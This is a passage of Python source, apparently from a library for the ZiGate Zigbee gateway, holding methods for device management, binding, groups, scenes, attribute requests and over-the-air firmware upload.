dispatch_signal(ZIGATE_DEVICE_UPDATED,
self, **{'zigate': self,
'device': self._devices[addr]})
def get_missing(self):
'''
return missing devices
'''
return [device for device in self._devices.values() if device.missing]
def cleanup_devices(self):
'''
remove devices tagged missing
'''
to_remove = [device.addr for device in self.get_missing()]
for addr in to_remove:
self._remove_device(addr)
def _remove_device(self, addr):
'''
remove device from addr
'''
device = self._devices.pop(addr)
dispatch_signal(ZIGATE_DEVICE_REMOVED, **{'zigate': self,
'addr': addr,
'device': device})
def _set_device(self, device):
'''
add/update device to cache list
'''
assert type(device) == Device
if device.addr in self._devices:
self._devices[device.addr].update(device)
dispatch_signal(ZIGATE_DEVICE_UPDATED, self, **{'zigate': self,
'device': self._devices[device.addr]})
else:
# check if device already exist with other address
d = self.get_device_from_ieee(device.ieee)
if d:
LOGGER.warning('Device already exists with another addr %s, rename it.', d.addr)
old_addr = d.addr
new_addr = device.addr
d.discovery = ''
d.update(device)
self._devices[new_addr] = d
del self._devices[old_addr]
dispatch_signal(ZIGATE_DEVICE_ADDRESS_CHANGED, self,
**{'zigate': self,
'device': d,
'old_addr': old_addr,
'new_addr': new_addr,
})
else:
self._devices[device.addr] = device
dispatch_signal(ZIGATE_DEVICE_ADDED, self, **{'zigate': self,
'device': device})
self.discover_device(device.addr)
def get_status_text(self, status_code):
        return STATUS_CODES.get(status_code,
                                'Failed with event code: %s' % status_code)
def _clear_response(self, msg_type):
if msg_type in self._last_response:
del self._last_response[msg_type]
def _wait_response(self, msg_type):
'''
wait for next msg_type response
'''
LOGGER.debug('Waiting for message 0x{:04x}'.format(msg_type))
t1 = time()
while self._last_response.get(msg_type) is None:
sleep(0.01)
t2 = time()
if t2 - t1 > WAIT_TIMEOUT: # no response timeout
LOGGER.warning('No response waiting command 0x{:04x}'.format(msg_type))
return
LOGGER.debug('Stop waiting, got message 0x{:04x}'.format(msg_type))
return self._last_response.get(msg_type)
def _wait_status(self, cmd):
'''
wait for status of cmd
'''
LOGGER.debug('Waiting for status message for command 0x{:04x}'.format(cmd))
t1 = time()
while self._last_status.get(cmd) is None:
sleep(0.01)
t2 = time()
if t2 - t1 > WAIT_TIMEOUT: # no response timeout
self._no_response_count += 1
LOGGER.warning('No response after command 0x{:04x} ({})'.format(cmd, self._no_response_count))
return
self._no_response_count = 0
LOGGER.debug('STATUS code to command 0x{:04x}:{}'.format(cmd, self._last_status.get(cmd)))
return self._last_status.get(cmd)
def __addr(self, addr):
''' convert hex string addr to int '''
if isinstance(addr, str):
addr = int(addr, 16)
return addr
def __haddr(self, int_addr, length=4):
''' convert int addr to hex '''
return '{0:0{1}x}'.format(int_addr, length)
@property
def devices(self):
return list(self._devices.values())
def get_device_from_addr(self, addr):
return self._devices.get(addr)
def get_device_from_ieee(self, ieee):
if ieee:
for d in self._devices.values():
if d.ieee == ieee:
return d
def get_devices_list(self, wait=False):
'''
refresh device list from zigate
'''
wait_response = None
if wait:
wait_response = 0x8015
self.send_data(0x0015, wait_response=wait_response)
def set_raw_mode(self, enable=True):
'''
Set Blue Led state ON/OFF
'''
data = struct.pack('!B', enable)
return self.send_data(0x0002, data)
def get_version(self, refresh=False):
'''
get zigate firmware version
'''
if not self._version or refresh:
r = self.send_data(0x0010, wait_response=0x8010)
if r:
self._version = r.data
else:
LOGGER.warning('Failed to retrieve zigate firmware version')
return self._version
def get_version_text(self, refresh=False):
'''
get zigate firmware version as text
'''
v = self.get_version(refresh)['version']
return v
def reset(self):
'''
reset zigate
'''
return self.send_data(0x0011, wait_status=False)
def erase_persistent(self):
'''
erase persistent data in zigate
'''
return self.send_data(0x0012, wait_status=False)
def factory_reset(self):
'''
ZLO/ZLL "Factory New" Reset
'''
return self.send_data(0x0013, wait_status=False)
def is_permitting_join(self):
'''
check if zigate is permitting join
'''
r = self.send_data(0x0014, wait_response=0x8014)
if r:
r = r.get('status', False)
return r
def set_time(self, dt=None):
'''
Set internal zigate time
dt should be datetime.datetime object
'''
dt = dt or datetime.datetime.now()
# timestamp from 2000-01-01 00:00:00
timestamp = int((dt - datetime.datetime(2000, 1, 1)).total_seconds())
data = struct.pack('!L', timestamp)
self.send_data(0x0016, data)
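    # For example, 2018-01-01 00:00:00 is sent as
    # int((datetime.datetime(2018, 1, 1) - datetime.datetime(2000, 1, 1)).total_seconds()) == 568080000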
def get_time(self):
'''
get internal zigate time
'''
r = self.send_data(0x0017, wait_response=0x8017)
dt = None
if r:
timestamp = r.get('timestamp')
dt = datetime.datetime(2000, 1, 1) + datetime.timedelta(seconds=timestamp)
return dt
def set_led(self, on=True):
'''
Set Blue Led state ON/OFF
'''
data = struct.pack('!?', on)
return self.send_data(0x0018, data)
def set_certification(self, standard=1):
'''
Set Certification CE=1, FCC=2
'''
data = struct.pack('!B', standard)
return self.send_data(0x0019, data)
def permit_join(self, duration=30):
'''
start permit join
duration in secs, 0 means stop permit join
'''
return self.send_data(0x0049, 'FFFC{:02X}00'.format(duration))
def stop_permit_join(self):
'''
convenient function to stop permit_join
'''
return self.permit_join(0)
def set_extended_panid(self, panid):
'''
Set Extended PANID
'''
data = struct.pack('!Q', panid)
return self.send_data(0x0020, data)
def set_channel(self, channels=None):
'''
set channel
'''
channels = channels or [11, 14, 15, 19, 20, 24, 25]
if not isinstance(channels, list):
channels = [channels]
mask = functools.reduce(lambda acc, x: acc ^ 2 ** x, channels, 0)
mask = struct.pack('!I', mask)
return self.send_data(0x0021, mask)
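    # Channel mask example: set_channel([11, 14]) builds 2**11 ^ 2**14 == 0x4800,
    # packed as a big-endian uint32.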
def set_type(self, typ=TYPE_COORDINATOR):
'''
set zigate mode type
'''
data = struct.pack('!B', typ)
self.send_data(0x0023, data)
def get_network_state(self):
''' get network state '''
r = self.send_data(0x0009, wait_response=0x8009)
if r:
data = r.cleaned_data()
self._addr = data['addr']
self._ieee = data['ieee']
self.panid = data['panid']
self.extended_panid = data['extended_panid']
self.channel = data['channel']
return data
def start_network(self, wait=False):
''' start network '''
wait_response = None
if wait:
wait_response = 0x8024
r = self.send_data(0x0024, wait_response=wait_response)
if wait and r:
data = r.cleaned_data()
self._addr = data['addr']
self._ieee = data['ieee']
self.channel = data['channel']
return r
def start_network_scan(self):
''' start network scan '''
return self.send_data(0x0025)
def remove_device(self, addr):
''' remove device '''
if addr in self._devices:
ieee = self._devices[addr].ieee
if not ieee:
LOGGER.warning('No ieee for %s, silently removing the device', self._devices[addr])
self._remove_device(addr)
else:
ieee = self.__addr(ieee)
zigate_ieee = self.__addr(self.ieee)
data = struct.pack('!QQ', zigate_ieee, ieee)
return self.send_data(0x0026, data)
def remove_device_ieee(self, ieee):
''' remove device '''
device = self.get_device_from_ieee(ieee)
if device:
self.remove_device(device.addr)
def enable_permissions_controlled_joins(self, enable=True):
'''
Enable Permissions Controlled Joins
'''
enable = 1 if enable else 2
data = struct.pack('!B', enable)
return self.send_data(0x0027, data)
def _choose_addr_mode(self, addr_ieee):
'''
Choose the right address mode
'''
if len(addr_ieee) == 4:
addr_fmt = 'H'
if addr_ieee in self._groups:
addr_mode = 1 # AddrMode.group
elif addr_ieee in self._devices:
addr_mode = 2 # AddrMode.short
else:
addr_mode = 0 # AddrMode.bound
else:
addr_mode = 3 # AddrMode.ieee
addr_fmt = 'Q'
return addr_mode, addr_fmt
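    # Example: a 4-char short address known in self._devices yields (2, 'H'),
    # an unknown 4-char address yields (0, 'H') (bound mode), and a full-length
    # IEEE address yields (3, 'Q').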
def _translate_addr(self, addr_ieee):
'''
translate ieee to addr if needed
'''
if len(addr_ieee) > 4:
return self.get_addr(addr_ieee)
return addr_ieee
def get_addr(self, ieee):
'''
retrieve short addr from ieee
'''
for d in self._devices.values():
if d.ieee == ieee:
return d.addr
LOGGER.error('Failed to retrieve short address for %s', ieee)
def _bind_unbind(self, cmd, ieee, endpoint, cluster,
dst_addr=None, dst_endpoint=1):
'''
bind
if dst_addr not specified, supposed zigate
'''
if not dst_addr:
dst_addr = self.ieee
addr_mode, addr_fmt = self._choose_addr_mode(dst_addr)
ieee = self.__addr(ieee)
dst_addr = self.__addr(dst_addr)
data = struct.pack('!QBHB' + addr_fmt + 'B', ieee, endpoint,
cluster, addr_mode, dst_addr, dst_endpoint)
wait_response = cmd + 0x8000
return self.send_data(cmd, data, wait_response)
def bind(self, ieee, endpoint, cluster, dst_addr=None, dst_endpoint=1):
'''
bind
if dst_addr not specified, supposed zigate
'''
return self._bind_unbind(0x0030, ieee, endpoint, cluster,
dst_addr, dst_endpoint)
def bind_addr(self, addr, endpoint, cluster, dst_addr=None,
dst_endpoint=1):
'''
bind using addr
if dst_addr not specified, supposed zigate
convenient function to use addr instead of ieee
'''
if addr in self._devices:
ieee = self._devices[addr].ieee
if ieee:
return self.bind(ieee, endpoint, cluster, dst_addr, dst_endpoint)
LOGGER.error('Failed to bind, addr %s, IEEE is missing', addr)
LOGGER.error('Failed to bind, addr %s unknown', addr)
def unbind(self, ieee, endpoint, cluster, dst_addr=None, dst_endpoint=1):
'''
unbind
if dst_addr not specified, supposed zigate
'''
return self._bind_unbind(0x0031, ieee, endpoint, cluster,
dst_addr, dst_endpoint)
def unbind_addr(self, addr, endpoint, cluster, dst_addr='0000',
dst_endpoint=1):
'''
unbind using addr
if dst_addr not specified, supposed zigate
convenient function to use addr instead of ieee
'''
if addr in self._devices:
ieee = self._devices[addr]['ieee']
return self.unbind(ieee, endpoint, cluster, dst_addr, dst_endpoint)
        LOGGER.error('Failed to unbind, addr %s unknown', addr)
def network_address_request(self, ieee):
''' network address request '''
target_addr = self.__addr('0000')
ieee = self.__addr(ieee)
data = struct.pack('!HQBB', target_addr, ieee, 0, 0)
r = self.send_data(0x0040, data, wait_response=0x8040)
if r:
return r.data['addr']
def ieee_address_request(self, addr):
''' ieee address request '''
target_addr = self.__addr('0000')
addr = self.__addr(addr)
data = struct.pack('!HHBB', target_addr, addr, 0, 0)
r = self.send_data(0x0041, data, wait_response=0x8041)
if r:
return r.data['ieee']
def node_descriptor_request(self, addr):
''' node descriptor request '''
return self.send_data(0x0042, addr)
def simple_descriptor_request(self, addr, endpoint):
'''
simple_descriptor_request
'''
addr = self.__addr(addr)
data = struct.pack('!HB', addr, endpoint)
return self.send_data(0x0043, data)
def power_descriptor_request(self, addr):
'''
power descriptor request
'''
return self.send_data(0x0044, addr)
def active_endpoint_request(self, addr):
'''
active endpoint request
'''
return self.send_data(0x0045, addr)
def leave_request(self, addr, ieee=None, rejoin=False,
remove_children=False):
'''
Management Leave request
rejoin : 0 do not rejoin, 1 rejoin
remove_children : 0 Leave, do not remove children
1 = Leave, removing children
'''
addr = self.__addr(addr)
if not ieee:
ieee = self._devices[addr]['ieee']
ieee = self.__addr(ieee)
data = struct.pack('!HQBB', addr, ieee, rejoin, remove_children)
return self.send_data(0x0047, data)
def lqi_request(self, addr='0000', index=0, wait=False):
'''
Management LQI request
'''
addr = self.__addr(addr)
data = struct.pack('!HB', addr, index)
wait_response = None
if wait:
wait_response = 0x804e
r = self.send_data(0x004e, data, wait_response=wait_response)
return r
def build_neighbours_table(self, force=False):
'''
Build neighbours table
'''
if force or not self._neighbours_table_cache:
self._neighbours_table_cache = self._neighbours_table(self.addr)
return self._neighbours_table_cache
def _neighbours_table(self, addr, nodes=None):
'''
Build neighbours table
'''
if nodes is None:
nodes = []
LOGGER.debug('Search for children of %s', addr)
nodes.append(addr)
index = 0
neighbours = []
entries = 255
while index < entries:
r = self.lqi_request(addr, index, True)
if not r:
LOGGER.error('Failed to build neighbours table')
return
data = r.cleaned_data()
entries = data['entries']
for n in data['neighbours']:
# bit_field
# bit 0-1 = u2RxOnWhenIdle 0/1
# bit 2-3 = u2Relationship 0/1/2
# bit 4-5 = u2PermitJoining 0/1
# bit 6-7 = u2DeviceType 0/1/2
is_parent = n['bit_field'][2:4] == '00'
is_child = n['bit_field'][2:4] == '01'
is_router = n['bit_field'][6:8] == '01'
if is_parent:
neighbours.append((n['addr'], addr, n['lqi']))
elif is_child:
neighbours.append((addr, n['addr'], n['lqi']))
elif n['depth'] == 0:
neighbours.append((self.addr, n['addr'], n['lqi']))
if is_router and n['addr'] not in nodes:
LOGGER.debug('%s is a router, search for children', n['addr'])
n2 = self._neighbours_table(n['addr'], nodes)
if n2:
neighbours += n2
index += data['count']
return neighbours
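    # The returned table is a flat list of (parent_addr, child_addr, lqi) tuples,
    # built by recursively querying every router discovered along the way.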
def refresh_device(self, addr, full=False):
'''
convenient function to refresh device attribute
'''
device = self.get_device_from_addr(addr)
if not device:
return
device.refresh_device(full)
def discover_device(self, addr, force=False):
'''
starts discovery process
'''
LOGGER.debug('discover_device %s', addr)
device = self.get_device_from_addr(addr)
if not device:
return
if force:
device.discovery = ''
device.info['mac_capability'] = ''
device.endpoints = {}
if device.discovery:
return
typ = device.get_type()
if typ:
LOGGER.debug('Found type')
if device.has_template():
LOGGER.debug('Found template, loading it')
device.load_template()
return
if 'mac_capability' not in device.info:
LOGGER.debug('no mac_capability')
self.node_descriptor_request(addr)
return
if not device.endpoints:
LOGGER.debug('no endpoints')
self.active_endpoint_request(addr)
return
if not typ:
return
if not device.load_template():
LOGGER.debug('Loading template failed, tag as auto-discovered')
device.discovery = 'auto-discovered'
for endpoint, values in device.endpoints.items():
for cluster in values.get('in_clusters', []):
self.attribute_discovery_request(addr, endpoint, cluster)
def _generate_addr(self):
addr = None
while not addr or addr in self._devices or addr in self._groups:
addr = random.randint(1, 0xffff)
return addr
@property
def groups(self):
'''
return known groups
'''
return self._groups
def get_group_for_addr(self, addr):
'''
return group for device addr
'''
groups = {}
for group, members in self._groups.items():
for member in members:
if member[0] == addr:
if member[1] not in groups:
groups[member[1]] = []
groups[member[1]].append(group)
continue
return groups
def _add_group(self, cmd, addr, endpoint, group=None):
'''
Add group
if group addr not specified, generate one
return group addr
'''
addr_mode = 2
addr = self.__addr(addr)
if not group:
group = self._generate_addr()
else:
group = self.__addr(group)
src_endpoint = 1
data = struct.pack('!BHBBH', addr_mode, addr,
src_endpoint, endpoint, group)
r = self.send_data(cmd, data)
group_addr = self.__haddr(group)
if r.status == 0:
self.__add_group(group_addr, self.__haddr(addr), endpoint)
return group_addr
def __add_group(self, group, addr, endpoint):
if group not in self._groups:
self._groups[group] = set()
self._groups[group].add((addr, endpoint))
def __remove_group(self, group, addr, endpoint):
'''
remove group for specified addr, endpoint
if group is None,
remove all group for specified addr, endpoint
'''
if group is None:
groups = list(self._groups.keys())
else:
groups = [group]
for group in groups:
if (addr, endpoint) in self._groups.get(group, set()):
self._groups[group].remove((addr, endpoint))
if group in self._groups and len(self._groups[group]) == 0:
del self._groups[group]
def _sync_group_membership(self, addr, endpoint, groups):
for group in groups:
self.__add_group(group, addr, endpoint)
to_remove = []
for group in self._groups:
if group not in groups:
to_remove.append(group)
for group in to_remove:
self.__remove_group(group, addr, endpoint)
def add_group(self, addr, endpoint, group=None):
'''
Add group
if group addr not specified, generate one
return group addr
'''
return self._add_group(0x0060, addr, endpoint, group)
def add_group_identify(self, addr, endpoint, group=None):
'''
Add group if identify ??
if group addr not specified, generate one
return group addr
'''
return self._add_group(0x0065, addr, endpoint, group)
def view_group(self, addr, endpoint, group):
'''
View group
'''
addr_mode = 2
addr = self.__addr(addr)
group = self.__addr(group)
src_endpoint = 1
data = struct.pack('!BHBBH', addr_mode, addr,
src_endpoint, endpoint, group)
return self.send_data(0x0061, data)
def get_group_membership(self, addr, endpoint, groups=[]):
'''
Get group membership
groups is list of group addr
if empty get all groups
'''
addr_mode = 2
addr = self.__addr(addr)
src_endpoint = 1
length = len(groups)
groups = [self.__addr(group) for group in groups]
data = struct.pack('!BHBBB{}H'.format(length), addr_mode, addr,
src_endpoint, endpoint, length, *groups)
return self.send_data(0x0062, data)
def remove_group(self, addr, endpoint, group=None):
'''
Remove group
if group not specified, remove all groups
'''
addr_mode = 2
addr = self.__addr(addr)
src_endpoint = 1
group_addr = group
if group is None:
data = struct.pack('!BHBB', addr_mode, addr,
src_endpoint, endpoint)
r = self.send_data(0x0064, data)
else:
group = self.__addr(group)
data = struct.pack('!BHBBH', addr_mode, addr,
src_endpoint, endpoint, group)
r = self.send_data(0x0063, data)
if r.status == 0:
self.__remove_group(group_addr, self.__haddr(addr), endpoint)
return r
def identify_device(self, addr, time_sec=5):
'''
convenient function that automatically find destination endpoint
'''
device = self._devices[addr]
device.identify_device(time_sec)
def identify_send(self, addr, endpoint, time_sec):
'''
identify query
'''
addr = self.__addr(addr)
data = struct.pack('!BHBBH', 2, addr, 1, endpoint, time_sec)
return self.send_data(0x0070, data)
def identify_query(self, addr, endpoint):
'''
identify query
'''
addr = self.__addr(addr)
data = struct.pack('!BHBB', 2, addr, 1, endpoint)
return self.send_data(0x0071, data)
def view_scene(self, addr, endpoint, group, scene):
'''
View scene
'''
addr = self.__addr(addr)
group = self.__addr(group)
data = struct.pack('!BHBBHB', 2, addr, 1, endpoint, group, scene)
return self.send_data(0x00A0, data)
def add_scene(self, addr, endpoint, group, scene, name, transition=0):
'''
Add scene
'''
addr = self.__addr(addr)
group = self.__addr(group)
data = struct.pack('!BHBBHB', 2, addr, 1, endpoint, group, scene)
return self.send_data(0x00A1, data)
def remove_scene(self, addr, endpoint, group, scene=None):
'''
Remove scene
if scene is not specified, remove all scenes
'''
addr = self.__addr(addr)
group = self.__addr(group)
if scene is None:
data = struct.pack('!BHBBH', 2, addr, 1, endpoint, group)
return self.send_data(0x00A3, data)
data = struct.pack('!BHBBHB', 2, addr, 1, endpoint, group, scene)
return self.send_data(0x00A2, data)
def store_scene(self, addr, endpoint, group, scene):
'''
Store scene
'''
addr = self.__addr(addr)
group = self.__addr(group)
data = struct.pack('!BHBBHB', 2, addr, 1, endpoint, group, scene)
return self.send_data(0x00A4, data)
def recall_scene(self, addr, endpoint, group, scene):
'''
        Recall scene
'''
addr = self.__addr(addr)
group = self.__addr(group)
data = struct.pack('!BHBBHB', 2, addr, 1, endpoint, group, scene)
return self.send_data(0x00A5, data)
def scene_membership_request(self, addr, endpoint, group):
'''
Scene Membership request
'''
addr = self.__addr(addr)
group = self.__addr(group)
data = struct.pack('!BHBBH', 2, addr, 1, endpoint, group)
return self.send_data(0x00A6, data)
def copy_scene(self, addr, endpoint, from_group, from_scene, to_group, to_scene):
'''
Copy scene
'''
addr = self.__addr(addr)
from_group = self.__addr(from_group)
to_group = self.__addr(to_group)
data = struct.pack('!BHBBBHBHB', 2, addr, 1, endpoint, 0,
from_group, from_scene,
to_group, to_scene)
return self.send_data(0x00A9, data)
def initiate_touchlink(self):
'''
Initiate Touchlink
'''
return self.send_data(0x00D0)
def touchlink_factory_reset(self):
'''
Touchlink factory reset
'''
return self.send_data(0x00D2)
def identify_trigger_effect(self, addr, endpoint, effect="blink"):
'''
identify_trigger_effect
effects available:
- blink: Light is switched on and then off (once)
- breathe: Light is switched on and off by smoothly increasing and then
decreasing its brightness over a one-second period, and then this is repeated 15 times
- okay: Colour light goes green for one second. Monochrome light flashes twice in one second.
- channel_change: Colour light goes orange for 8 seconds. Monochrome light switches to
maximum brightness for 0.5 s and then to minimum brightness for 7.5 s
- finish_effect: Current stage of effect is completed and then identification mode is
terminated (e.g. for the Breathe effect, only the current one-second cycle will be completed)
- Stop effect: Current effect and identification mode are terminated as soon as possible
'''
effects = {
'blink': 0x00,
'breathe': 0x01,
'okay': 0x02,
'channel_change': 0x0b,
'finish_effect': 0xfe,
'stop_effect': 0xff
}
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
if effect not in effects.keys():
effect = 'blink'
effect_variant = 0 # Current Zigbee standard doesn't provide any variant
data = struct.pack('!B' + addr_fmt + 'BBBB', addr_mode, addr, 1, endpoint, effects[effect], effect_variant)
return self.send_data(0x00E0, data)
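    # Usage sketch (hypothetical address): identify_trigger_effect('abcd', 1, 'breathe')
    # asks endpoint 1 of short address 'abcd' to run the breathe effect; unknown
    # effect names fall back to 'blink'.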
def read_attribute_request(self, addr, endpoint, cluster, attributes,
direction=0, manufacturer_code=0):
'''
Read Attribute request
attribute can be a unique int or a list of int
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
if not isinstance(attributes, list):
attributes = [attributes]
length = len(attributes)
manufacturer_specific = manufacturer_code != 0
for i in range(0, length, 10):
sub_attributes = attributes[i: i + 10]
sub_length = len(sub_attributes)
data = struct.pack('!B' + addr_fmt + 'BBHBBHB{}H'.format(sub_length), addr_mode, addr, 1,
endpoint, cluster,
direction, manufacturer_specific,
manufacturer_code, sub_length, *sub_attributes)
self.send_data(0x0100, data)
def write_attribute_request(self, addr, endpoint, cluster, attributes,
direction=0, manufacturer_code=0):
'''
Write Attribute request
attribute could be a tuple of (attribute_id, attribute_type, data)
or a list of tuple (attribute_id, attribute_type, data)
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
fmt = ''
if not isinstance(attributes, list):
attributes = [attributes]
attributes_data = []
for attribute_tuple in attributes:
data_type = DATA_TYPE[attribute_tuple[1]]
fmt += 'HB' + data_type
attributes_data += attribute_tuple
length = len(attributes)
manufacturer_specific = manufacturer_code != 0
data = struct.pack('!B' + addr_fmt + 'BBHBBHB{}'.format(fmt), addr_mode, addr, 1,
endpoint, cluster,
direction, manufacturer_specific,
manufacturer_code, length, *attributes_data)
self.send_data(0x0110, data)
def write_attribute_request_ias(self, addr, endpoint,
warning_mode, duration, strobe_cycle, strobe_level,
direction=0, manufacturer_code=0):
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
manufacturer_specific = manufacturer_code != 0
data = struct.pack('!B' + addr_fmt + 'BBBBHBHBB', addr_mode, addr, 1,
endpoint,
direction, manufacturer_specific, manufacturer_code,
warning_mode, duration, strobe_cycle, strobe_level)
self.send_data(0x0111, data)
def write_attribute_request_ias_squawk(self, addr, endpoint,
squawk_mode_strobe_level,
direction=0, manufacturer_code=0):
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
manufacturer_specific = manufacturer_code != 0
data = struct.pack('!B' + addr_fmt + 'BBBBHB', addr_mode, addr, 1,
endpoint,
direction, manufacturer_specific, manufacturer_code,
squawk_mode_strobe_level)
self.send_data(0x0112, data)
def reporting_request(self, addr, endpoint, cluster, attributes,
direction=0, manufacturer_code=0, min_interval=1, max_interval=3600):
'''
Configure reporting request
attribute could be a tuple of (attribute_id, attribute_type)
or a list of tuple (attribute_id, attribute_type)
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
if not isinstance(attributes, list):
attributes = [attributes]
length = len(attributes)
attribute_direction = 0
timeout = 0
change = 0
fmt = ''
attributes_data = []
for attribute_tuple in attributes:
fmt += 'BBHHHHB'
attributes_data += [attribute_direction,
attribute_tuple[1],
attribute_tuple[0],
min_interval,
max_interval,
timeout,
change
]
manufacturer_specific = manufacturer_code != 0
data = struct.pack('!B' + addr_fmt + 'BBHBBHB{}'.format(fmt), addr_mode, addr, 1, endpoint, cluster,
direction, manufacturer_specific,
manufacturer_code, length, *attributes_data)
r = self.send_data(0x0120, data, 0x8120)
# reporting not supported on cluster 6, supposed on/off attribute
if r and r.status == 0x8c and r.cluster == 6:
device = self._devices[r.addr]
device.set_assumed_state()
return r
def ota_load_image(self, path_to_file):
# Check that ota process is not active
if self._ota['active'] is True:
LOGGER.error('Cannot load image while OTA process is active.')
self.get_ota_status()
return
# Try reading file from user provided path
try:
with open(path_to_file, 'rb') as f:
ota_file_content = f.read()
except OSError as err:
LOGGER.error('{path}: {error}'.format(path=path_to_file, error=err))
return False
if ota_file_content.startswith(b'NGIS'):
LOGGER.debug('Signed file, removing signature')
header_end = struct.unpack('<I', ota_file_content[0x10:0x14])[0]
footer_pos = struct.unpack('<I', ota_file_content[0x18:0x1C])[0]
ota_file_content = ota_file_content[header_end:footer_pos]
# Ensure that file has 69 bytes so it can contain header
if len(ota_file_content) < 69:
LOGGER.error('OTA file is too short')
return False
# Read header data
try:
header_data = list(struct.unpack('<LHHHHHLH32BLBQHH', ota_file_content[:69]))
except struct.error:
LOGGER.exception('Header is not correct')
return False
# Fix header str
# First replace null characters from header str to spaces
for i in range(8, 40):
if header_data[i] == 0x00:
header_data[i] = 0x20
# Reconstruct header data
header_data_compact = header_data[0:8] + [header_data[8:40]] + header_data[40:]
# Convert header data to dict
header_headers = [
'file_id', 'header_version', 'header_length', 'header_fctl', 'manufacturer_code', 'image_type',
'image_version', 'stack_version', 'header_str', 'size', 'security_cred_version', 'upgrade_file_dest',
'min_hw_version', 'max_hw_version'
]
header = dict(zip(header_headers, header_data_compact))
# Check that size from header corresponds to file size
if header['size'] != len(ota_file_content):
            LOGGER.error('Header size({header}) and file size({file}) do not match'.format(
header=header['size'], file=len(ota_file_content)
))
return False
destination_address_mode = 0x02
destination_address = 0x0000
data = struct.pack('!BHlHHHHHLH32BLBQHH', destination_address_mode, destination_address, *header_data)
response = self.send_data(0x0500, data)
# If response is success place header and file content to variable
if response.status == 0:
LOGGER.info('OTA header loaded to server successfully.')
self._ota_reset_local_variables()
self._ota['image']['header'] = header
self._ota['image']['data'] = ota_file_content
else:
            LOGGER.warning('Something is wrong with the OTA file header.')
def _ota_send_image_data(self, request):
errors = False
# Ensure that image is loaded using ota_load_image
if self._ota['image']['header'] is None:
LOGGER.error('No header found. Load image using ota_load_image(\'path_to_ota_image\')')
errors = True
if self._ota['image']['data'] is None:
            LOGGER.error('No data found. Load image using ota_load_image(\'path_to_ota_image\')')
errors = True
if errors:
return
# Compare received image data to loaded image
errors = False
if request['image_version'] != self._ota['image']['header']['image_version']:
LOGGER.error('Image versions do not match. Make sure you have correct image loaded.')
errors = True
if request['image_type'] != self._ota['image']['header']['image_type']:
LOGGER.error('Image types do not match. Make sure you have correct image loaded.')
errors = True
if request['manufacturer_code'] != self._ota['image']['header']['manufacturer_code']:
LOGGER.error('Manufacturer codes do not match. Make sure you have correct image loaded.')
errors = True
if errors:
return
# Mark ota process started
if self._ota['starttime'] is False and self._ota['active'] is False:
self._ota['starttime'] = datetime.datetime.now()
self._ota['active'] = True
self._ota['transfered'] = 0
self._ota['addr'] = request['addr']
source_endpoint = 0x01
ota_status = 0x00 # Success. Using value 0x01 would make client to request data again later
# Get requested bytes from ota file
self._ota['transfered'] = request['file_offset']
end_position = request['file_offset'] + request['max_data_size']
ota_data_to_send = self._ota['image']['data'][request['file_offset']:end_position]
data_size = len(ota_data_to_send)
ota_data_to_send = struct.unpack('<{}B'.format(data_size), ota_data_to_send)
# Giving user feedback of ota process
self.get_ota_status(debug=True)
data = struct.pack('!BHBBBBLLHHB{}B'.format(data_size), request['address_mode'], self.__addr(request['addr']),
source_endpoint, request['endpoint'], request['sequence'], ota_status,
request['file_offset'], self._ota['image']['header']['image_version'],
self._ota['image']['header']['image_type'],
self._ota['image']['header']['manufacturer_code'],
data_size, *ota_data_to_send)
self.send_data(0x0502, data, wait_status=False)
def _ota_handle_upgrade_end_request(self, request):
if self._ota['active'] is True:
# Handle error statuses
if request['status'] == 0x00:
                LOGGER.info('OTA image upload finished successfully in {seconds}s.'.format(
seconds=(datetime.datetime.now() - self._ota['starttime']).seconds))
elif request['status'] == 0x95:
LOGGER.warning('OTA aborted by client')
elif request['status'] == 0x96:
                LOGGER.warning('OTA image uploaded successfully, but image verification failed.')
elif request['status'] == 0x99:
LOGGER.warning('OTA image uploaded successfully, but client needs more images for update.')
elif request['status'] != 0x00:
LOGGER.warning('Some unexpected OTA status {}'.format(request['status']))
# Reset local ota variables
self._ota_reset_local_variables()
def _ota_reset_local_variables(self):
self._ota = {
'image': {
'header': None,
'data': None,
},
'active': False,
'starttime': False,
'transfered': 0,
'addr': None
}
def get_ota_status(self, debug=False):
if self._ota['active']:
image_size = len(self._ota['image']['data'])
time_passed = (datetime.datetime.now() - self._ota['starttime']).seconds
try:
time_remaining = int((image_size / self._ota['transfered']) * time_passed) - time_passed
except ZeroDivisionError:
time_remaining = -1
message = 'OTA upgrade address {addr}: {sent:>{width}}/{total:>{width}} {percentage:.3%}'.format(
addr=self._ota['addr'], sent=self._ota['transfered'], total=image_size,
percentage=self._ota['transfered'] / image_size, width=len(str(image_size)))
message += ' time elapsed: {passed}s Time remaining estimate: {remaining}s'.format(
passed=time_passed, remaining=time_remaining
)
else:
message = "OTA process is not active"
if debug:
LOGGER.debug(message)
else:
LOGGER.info(message)
def ota_image_notify(self, addr, destination_endpoint=0x01, payload_type=0):
"""
        Send image available notification to the client. This starts the OTA process.
:param addr:
:param destination_endpoint:
:param payload_type: 0, 1, 2, 3
:type payload_type: int
:return:
"""
# Get required data from ota header
if self._ota['image']['header'] is None:
LOGGER.warning('Cannot read ota header. No ota file loaded.')
return False
image_version = self._ota['image']['header']['image_version']
image_type = self._ota['image']['header']['image_type']
manufacturer_code = self._ota['image']['header']['manufacturer_code']
source_endpoint = 0x01
destination_address_mode = 0x02 # uint16
destination_address = self.__addr(addr)
query_jitter = 100
if payload_type == 0:
image_version = 0xFFFFFFFF
image_type = 0xFFFF
manufacturer_code = 0xFFFF
elif payload_type == 1:
image_version = 0xFFFFFFFF
image_type = 0xFFFF
elif payload_type == 2:
image_version = 0xFFFFFFFF
data = struct.pack('!BHBBBLHHB', destination_address_mode, destination_address,
source_endpoint, destination_endpoint, 0,
image_version, image_type, manufacturer_code, query_jitter)
self.send_data(0x0505, data)
def attribute_discovery_request(self, addr, endpoint, cluster,
direction=0, manufacturer_code=0):
'''
Attribute discovery request
'''
addr = self.__addr(addr)
manufacturer_specific = manufacturer_code != 0
